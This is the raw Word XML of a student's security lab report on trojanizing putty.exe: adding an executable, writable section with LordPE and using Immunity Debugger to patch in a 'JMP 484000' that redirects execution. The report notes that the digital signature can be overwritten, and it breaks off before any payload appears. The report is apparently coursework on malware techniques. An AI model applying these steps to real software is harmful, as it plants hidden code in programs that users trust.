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0D2AD0" w14:textId="0E48F609" w:rsidR="007F588C" w:rsidRDefault="007F588C" w:rsidP="007F588C">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lab </w:t>
      </w:r>
      <w:r w:rsidR="00B86DD2">
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00327149" w:rsidRPr="00327149">
        <w:t>EXE With Trojan Code in a New Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60304873" w14:textId="77777777" w:rsidR="007F588C" w:rsidRDefault="007F588C" w:rsidP="007F588C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Huynh Ngoc Quang – SE181838</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BEA9AA" w14:textId="3DA8A6F4" w:rsidR="000B7364" w:rsidRDefault="00924091">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924091">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 1: Add a Section with LordPE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384BC22E" w14:textId="4AA5EC7E" w:rsidR="00924091" w:rsidRDefault="00262953">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00262953">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Copying putty.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D256C7" w14:textId="35CFC31E" w:rsidR="00262953" w:rsidRDefault="009D2F38">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E7D2193" wp14:editId="52D3742E">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2035172134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72134" name="Picture 1" descr="A computer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0359" w14:textId="4DCA3C5D" w:rsidR="009D2F38" w:rsidRDefault="00D253F5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D253F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Getting LordPE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042130C3" w14:textId="56732B1C" w:rsidR="00D253F5" w:rsidRDefault="000A4293">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B49B847" wp14:editId="4E25B868">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="129070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70681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5FC8" w14:textId="2E3017EC" w:rsidR="000A4293" w:rsidRDefault="00DD5651">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5651">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Adding a New Section to the PE Header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FE8219" w14:textId="77777777" w:rsidR="000634D2" w:rsidRPr="000634D2" w:rsidRDefault="000634D2" w:rsidP="000634D2">
      <w:r w:rsidRPr="000634D2">
        <w:t>In the LordPE window, on the right side, click the "</w:t>
      </w:r>
      <w:r w:rsidRPr="000634D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PE Editor</w:t>
      </w:r>
      <w:r w:rsidRPr="000634D2">
        <w:t>" button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D1F936" w14:textId="77777777" w:rsidR="000634D2" w:rsidRPr="000634D2" w:rsidRDefault="000634D2" w:rsidP="000634D2">
      <w:r w:rsidRPr="000634D2">
        <w:t xml:space="preserve">In the Open box, navigate to </w:t>
      </w:r>
      <w:r w:rsidRPr="000634D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">putty-newsec-YOURNAME.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="000634D2">
        <w:t>and double-click it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409908BA" w14:textId="77525751" w:rsidR="00DD5651" w:rsidRDefault="000634D2" w:rsidP="000634D2">
      <w:r w:rsidRPr="000634D2">
        <w:t>A "PE Editor" box opens, showing general information about putty, as shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB7F039" w14:textId="4954C455" w:rsidR="000634D2" w:rsidRDefault="00A44A1B" w:rsidP="00A44A1B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53FCDDC0" wp14:editId="32EEC35B">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="625168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16843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2CCA" w14:textId="77777777" w:rsidR="00D01F78" w:rsidRPr="00D01F78" w:rsidRDefault="00D01F78" w:rsidP="00D01F78">
      <w:r w:rsidRPr="00D01F78">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In the "PE Editor" box, on the right, click the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D01F78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sections </w:t>
      </w:r>
      <w:r w:rsidRPr="00D01F78">
        <w:t>button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A18074B" w14:textId="77777777" w:rsidR="00D01F78" w:rsidRPr="00D01F78" w:rsidRDefault="00D01F78" w:rsidP="00D01F78">
      <w:r w:rsidRPr="00D01F78">
        <w:t>A "Section Table" box opens, showing the four sections in the putty executable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35490ADD" w14:textId="1701FEC5" w:rsidR="005C3FC3" w:rsidRDefault="005C3FC3" w:rsidP="00D01F78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="429777B3" wp14:editId="0BC67002">
            <wp:extent cx="5943600" cy="3327400"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="571334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3454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8DC8" w14:textId="772082DB" w:rsidR="00D01F78" w:rsidRPr="00D01F78" w:rsidRDefault="00D01F78" w:rsidP="00D01F78">
      <w:r w:rsidRPr="00D01F78">
        <w:t>Right-click one of the sections and click "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D01F78">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>add section header</w:t>
      </w:r>
      <w:r w:rsidRPr="00D01F78">
        <w:t>", as shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC28540" w14:textId="34F8BD33" w:rsidR="00D01F78" w:rsidRDefault="00A4299D" w:rsidP="00D01F78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="457F0BDE" wp14:editId="70B9D72A">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2047256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566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67A6" w14:textId="1CBA8CE4" w:rsidR="00EB42CC" w:rsidRDefault="00EB42CC" w:rsidP="00D01F78">
      <w:r w:rsidRPr="00EB42CC">
        <w:lastRenderedPageBreak/>
        <w:t>A new section named "NewSec" appears. Currently, this section has "VSize" and "RSize" values of 0, as shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0E6335" w14:textId="41525283" w:rsidR="00A4299D" w:rsidRDefault="00EB42CC" w:rsidP="00D01F78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E3430E7" wp14:editId="31FEEBFE">
            <wp:extent cx="5943600" cy="3345180"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="126926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6118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BFF6" w14:textId="77777777" w:rsidR="00EA6C9D" w:rsidRPr="00EA6C9D" w:rsidRDefault="00EA6C9D" w:rsidP="00EA6C9D">
      <w:r w:rsidRPr="00EA6C9D">
        <w:t xml:space="preserve">In the "Section Table" box, right-click </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA6C9D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">NewSec </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA6C9D">
        <w:t>and click "</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA6C9D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>edit section header</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA6C9D">
        <w:t>".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D25F989" w14:textId="77777777" w:rsidR="00EA6C9D" w:rsidRPr="00EA6C9D" w:rsidRDefault="00EA6C9D" w:rsidP="00EA6C9D">
      <w:r w:rsidRPr="00EA6C9D">
        <w:t xml:space="preserve">In the "[Edit SectionHeader]" window, change the </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA6C9D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VirtualSize </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA6C9D">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA6C9D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">RawSize </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA6C9D">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA6C9D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">00001000 </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA6C9D">
        <w:t>as shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A39E753" w14:textId="38BF2FE4" w:rsidR="002A2DF5" w:rsidRDefault="00DD21C8" w:rsidP="00D01F78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="199D168C" wp14:editId="7B70694D">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1721037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03736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11CA" w14:textId="3BACBB3B" w:rsidR="00DD21C8" w:rsidRDefault="00071CF2" w:rsidP="00D01F78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C97A4FE" wp14:editId="010B2F0E">
            <wp:extent cx="5943600" cy="3345180"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="16578242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82424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5A2D" w14:textId="77777777" w:rsidR="00DA6EA1" w:rsidRPr="00DA6EA1" w:rsidRDefault="00DA6EA1" w:rsidP="00DA6EA1">
      <w:r w:rsidRPr="00DA6EA1">
        <w:t xml:space="preserve">In the "[Edit SectionHeader]" window, at the bottom, in the "Flags" row, click the square button labelled </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6EA1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6EA1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2717BE36" w14:textId="4D8970F2" w:rsidR="00071CF2" w:rsidRDefault="00DA6EA1" w:rsidP="00DA6EA1">
      <w:r w:rsidRPr="00DA6EA1">
        <w:t>Note the top three check boxes here: this segment is Executable, Readable, and Writeable. That's good; we can place any type of code we want to here, even self-modifying</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6EA1">
        <w:t>code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3B71AA" w14:textId="72B6613D" w:rsidR="00BC09CA" w:rsidRDefault="00397E27" w:rsidP="00D01F78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59BD6243" wp14:editId="2251544D">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1418380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8041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3390" w14:textId="77777777" w:rsidR="00CE1175" w:rsidRPr="00CE1175" w:rsidRDefault="00CE1175" w:rsidP="00CE1175">
      <w:r w:rsidRPr="00CE1175">
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1175">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1175">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B4FAED" w14:textId="77777777" w:rsidR="00CE1175" w:rsidRPr="00CE1175" w:rsidRDefault="00CE1175" w:rsidP="00CE1175">
      <w:r w:rsidRPr="00CE1175">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1175">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1175">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380B00E2" w14:textId="77777777" w:rsidR="00CE1175" w:rsidRPr="00CE1175" w:rsidRDefault="00CE1175" w:rsidP="00CE1175">
      <w:r w:rsidRPr="00CE1175">
        <w:t>Close the "Section Table" box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192DAD14" w14:textId="77777777" w:rsidR="00CE1175" w:rsidRPr="00CE1175" w:rsidRDefault="00CE1175" w:rsidP="00CE1175">
      <w:r w:rsidRPr="00CE1175">
        <w:t xml:space="preserve">In the "PE Editor" box, click the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1175">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Save </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1175">
        <w:t>button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08559CFB" w14:textId="77777777" w:rsidR="00CE1175" w:rsidRPr="00CE1175" w:rsidRDefault="00CE1175" w:rsidP="00CE1175">
      <w:r w:rsidRPr="00CE1175">
        <w:t xml:space="preserve">In the "PE Editor" box, click the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1175">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OK </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1175">
        <w:t>button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD89823" w14:textId="5773EBF3" w:rsidR="00397E27" w:rsidRDefault="00CE1175" w:rsidP="00CE1175">
      <w:r w:rsidRPr="00CE1175">
        <w:t>Close the LordPE window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600015CB" w14:textId="114DA44E" w:rsidR="00CE1175" w:rsidRDefault="00030C9E" w:rsidP="00CE1175">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00030C9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 2: Redirecting Code Execution with Immunity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C6A4B3" w14:textId="7A26EEA0" w:rsidR="00030C9E" w:rsidRDefault="00254AC9" w:rsidP="00CE1175">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00254AC9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Using Immunity to Examine the NewSec Section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB6CE1E" w14:textId="77777777" w:rsidR="001F1F69" w:rsidRPr="001F1F69" w:rsidRDefault="001F1F69" w:rsidP="001F1F69">
      <w:r w:rsidRPr="001F1F69">
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Start</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1F69">
        <w:t xml:space="preserve">. Search for </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Immunity Debugger </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1F69">
        <w:t>and start it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420E1C01" w14:textId="77777777" w:rsidR="001F1F69" w:rsidRPr="001F1F69" w:rsidRDefault="001F1F69" w:rsidP="001F1F69">
      <w:r w:rsidRPr="001F1F69">
        <w:t xml:space="preserve">In Immunity, from the menu bar, click </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1F69">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1F69">
        <w:t xml:space="preserve">. Navigate to </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">putty-newsec-YOURNAME.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1F69">
        <w:t>and open it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32553AAA" w14:textId="77777777" w:rsidR="001F1F69" w:rsidRPr="001F1F69" w:rsidRDefault="001F1F69" w:rsidP="001F1F69">
      <w:r w:rsidRPr="001F1F69">
        <w:t xml:space="preserve">From the Immunity menu bar, click </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>View</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1F69">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Memory</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1F69">
        <w:t>. as shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD27288" w14:textId="0AB85F9B" w:rsidR="00254AC9" w:rsidRDefault="001F1F69" w:rsidP="001F1F69">
      <w:r w:rsidRPr="001F1F69">
        <w:t xml:space="preserve">Immunity shows the memory layout of putty. As outlined in blue in the image below, the "NewSec" section begins at address </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1F69">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>484000</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1F69">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486517B3" w14:textId="0F72C1F3" w:rsidR="001F1F69" w:rsidRDefault="003F0482" w:rsidP="001F1F69">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40875042" wp14:editId="0DB4C136">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="11220556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05562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F4B0A" w14:textId="23600E1A" w:rsidR="003F0482" w:rsidRDefault="004A43B8" w:rsidP="001F1F69">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3709D390" wp14:editId="39F25CCE">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="387195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19588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7D0B" w14:textId="77777777" w:rsidR="00BB315F" w:rsidRPr="00BB315F" w:rsidRDefault="00BB315F" w:rsidP="00BB315F">
      <w:r w:rsidRPr="00BB315F">
        <w:t xml:space="preserve">In the "Memory </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB315F">
        <w:t>ma[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB315F">
        <w:t xml:space="preserve">" window, double-click </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB315F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NewSec</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB315F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046672AB" w14:textId="528211F8" w:rsidR="004A43B8" w:rsidRDefault="00BB315F" w:rsidP="00BB315F">
      <w:r w:rsidRPr="00BB315F">
        <w:t>A "Dump" window opens, showing the data stored in NewSec, as shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36321641" w14:textId="15EC45BF" w:rsidR="000F09D1" w:rsidRDefault="00036AF2" w:rsidP="00BB315F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="243C7326" wp14:editId="070AE312">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="667559206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59206" name="Picture 1" descr="A computer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327B" w14:textId="619E5942" w:rsidR="00371712" w:rsidRPr="00371712" w:rsidRDefault="00371712" w:rsidP="00371712">
      <w:r w:rsidRPr="00371712">
        <w:t>This is a digital signature, added to recent downloads of Putty. Notice the readable text in the lower portion of this window, on the right side, saying "AddTrust External</w:t>
      </w:r>
      <w:r w:rsidR="00DC30CE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00371712">
        <w:t>CA Root".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CE6C62" w14:textId="77777777" w:rsidR="00371712" w:rsidRPr="00371712" w:rsidRDefault="00371712" w:rsidP="00371712">
      <w:r w:rsidRPr="00371712">
        <w:lastRenderedPageBreak/>
        <w:t>The digital signature is a good way to verify file integrity, but it's not essential for file execution, so we can overwrite it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B91DAB" w14:textId="55018AAA" w:rsidR="00036AF2" w:rsidRDefault="00371712" w:rsidP="00371712">
      <w:r w:rsidRPr="00371712">
        <w:t>Close the Dump window. Close the "Memory map" window</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1930E17E" w14:textId="7E39FFE6" w:rsidR="00DC30CE" w:rsidRDefault="00655657" w:rsidP="00371712">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00655657">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Using Immunity to Redirect Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F855B56" w14:textId="77777777" w:rsidR="00806FD3" w:rsidRPr="00806FD3" w:rsidRDefault="00806FD3" w:rsidP="00806FD3">
      <w:r w:rsidRPr="00806FD3">
        <w:t>In Immunity, maximize the CPU window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291F7A82" w14:textId="3A0DE5C8" w:rsidR="00655657" w:rsidRDefault="00806FD3" w:rsidP="00806FD3">
      <w:r w:rsidRPr="00806FD3">
        <w:t>In the top left pane of the CPU window, right-click, and click "</w:t>
      </w:r>
      <w:r w:rsidRPr="00806FD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Go to</w:t>
      </w:r>
      <w:r w:rsidRPr="00806FD3">
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:r w:rsidRPr="00806FD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Expression</w:t>
      </w:r>
      <w:r w:rsidRPr="00806FD3">
        <w:t>, as shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FED8ECF" w14:textId="47032CDF" w:rsidR="00806FD3" w:rsidRDefault="00442493" w:rsidP="00806FD3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FDD30F7" wp14:editId="436D6648">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1799790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7903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E7A7" w14:textId="0576D9B1" w:rsidR="00EF4CC1" w:rsidRDefault="00EF4CC1" w:rsidP="00806FD3">
      <w:r w:rsidRPr="00EF4CC1">
        <w:t xml:space="preserve">In the "Enter expression to follow" box, enter </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF4CC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">41CB6E </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF4CC1">
        <w:t xml:space="preserve">as shown below. Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF4CC1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF4CC1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D62E2E" w14:textId="570D8B03" w:rsidR="004C3A3B" w:rsidRDefault="004C3A3B" w:rsidP="00806FD3">
      <w:r w:rsidRPr="004C3A3B">
        <w:t>Immunity moves to show the PUSH instruction that loads the "login as: " string, as shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E92A65" w14:textId="48F91CCD" w:rsidR="007676FA" w:rsidRDefault="007676FA" w:rsidP="00806FD3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="619ECD47" wp14:editId="20A2020C">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="691140399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40399" name="Picture 1" descr="A computer screen with text and numb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87B3" w14:textId="7B508F02" w:rsidR="002A2DF5" w:rsidRDefault="00234F6D" w:rsidP="00D01F78">
      <w:r w:rsidRPr="00234F6D">
        <w:t xml:space="preserve">Right-click the </w:t>
      </w:r>
      <w:r w:rsidRPr="00234F6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PUSH </w:t>
      </w:r>
      <w:r w:rsidRPr="00234F6D">
        <w:t xml:space="preserve">instruction and click </w:t>
      </w:r>
      <w:r w:rsidRPr="00234F6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Assemble</w:t>
      </w:r>
      <w:r w:rsidRPr="00234F6D">
        <w:t>, as shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57270C78" w14:textId="77777777" w:rsidR="002C3285" w:rsidRPr="002C3285" w:rsidRDefault="002C3285" w:rsidP="002C3285">
      <w:r w:rsidRPr="002C3285">
        <w:t>In the "Assemble" box, enter this command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4507C8" w14:textId="10162A78" w:rsidR="002C3285" w:rsidRDefault="002C3285" w:rsidP="002C3285">
      <w:r w:rsidRPr="002C3285">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JMP 484000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AB4DF5" w14:textId="62DCCBA4" w:rsidR="007A3509" w:rsidRDefault="0004510C" w:rsidP="00D01F78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B7D35C8" wp14:editId="7C3B8152">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2008177758" name="Picture 1" descr="A computer screen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77758" name="Picture 1" descr="A computer screen with text and number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F60CE" w14:textId="77777777" w:rsidR="00E059CA" w:rsidRPr="00E059CA" w:rsidRDefault="00E059CA" w:rsidP="00E059CA">
      <w:r w:rsidRPr="00E059CA">
        <w:t xml:space="preserve">Click the </w:t>
      </w:r>
